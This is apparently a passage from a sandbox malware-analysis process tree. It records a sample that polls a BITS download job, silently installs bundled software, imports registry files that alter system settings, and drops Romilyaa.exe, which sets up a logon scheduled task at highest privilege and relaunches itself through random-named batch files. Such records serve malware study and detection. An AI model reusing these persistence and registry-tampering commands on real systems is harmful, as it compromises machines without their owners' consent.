C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3468
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2828
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3824
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3692
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1324
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:4012
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2876
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3232
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:820
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2172
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3704
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2108
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2564
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1696
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3796
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3104
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3076
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3288
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:4084
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2668
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2176
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3364
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2968
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2768
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:352
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3096
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2804
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3700
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1944
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:656
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2828
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3800
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3696
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3872
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3232
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1396
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:4012
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1928
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2508
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3704
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2104
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1780
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3736
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3712
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3972
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1540
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1696
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2264
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3980
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2668
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3680
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:864
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3340
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2768
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1852
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3364
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3976
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2576
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2044
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:4004
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2900
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2636
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3028
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3892
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3876
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1324
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3444
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:888
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2208
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2320
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2192
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3724
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1980
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2696
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1936
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1548
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3196
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3148
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3708
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3432
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3136
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3796
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:816
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1076
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3884
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1216
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:972
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:292
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1916
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2924
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3728
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3024
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2100
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2424
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:556
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2652
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3916
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:4000
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2800
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1648
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3964
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3232
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3704
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:940
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1548
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵
- System Location Discovery: System Language Discovery
PID:2104
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2864
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:688
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2084
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:816
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2760
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K SilentSetup.cmd4⤵
- Loads dropped DLL
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exeWinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2592 -
C:\Users\Admin\AppData\Local\Temp\is-4F7KN.tmp\WinaeroTweaker-1.40.0.0-setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-4F7KN.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$202B6,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3108 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f7⤵PID:1972
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweaker.exe /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3268
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f7⤵PID:2860
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweakerhelper.exe /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3244
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\regmess.exeregmess.exe3⤵
- Executes dropped EXE
PID:3716 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\regmess_891d7576-d75f-40cc-8f46-fe150d51ac53\regmess.bat" "4⤵PID:3868
-
C:\Windows\SysWOW64\reg.exereg import Setup.reg /reg:325⤵PID:3984
-
-
C:\Windows\SysWOW64\reg.exereg import Console.reg /reg:325⤵PID:4072
-
-
C:\Windows\SysWOW64\reg.exereg import Desktop.reg /reg:325⤵
- Sets desktop wallpaper using registry
PID:2660
-
-
C:\Windows\SysWOW64\reg.exereg import International.reg /reg:325⤵PID:1928
-
-
C:\Windows\SysWOW64\reg.exereg import Fonts.reg /reg:325⤵
- Modifies Internet Explorer settings
PID:376
-
-
C:\Windows\SysWOW64\reg.exereg import Cursors.reg /reg:325⤵PID:3060
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 103⤵
- Delays execution with timeout.exe
PID:3732
-
-
C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\scary.exescary.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:4048 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:656
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2336 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:2800
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\uixAZbLyWYLh.bat" "5⤵PID:1152
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:2196
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2216
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2676 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:1896
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\VgdjGa4Of9Cl.bat" "7⤵PID:3692
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:3856
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2376
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3984 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:3708
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\2f7lJHwUkTnN.bat" "9⤵PID:3744
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:2736
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:480
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2552 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:3684
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\NqXzmCiceS4n.bat" "11⤵PID:920
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:980
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2236
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:564 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:1848
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\bKzmvwa2X9oq.bat" "13⤵PID:2744
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:3140
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3104
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"14⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2948 -
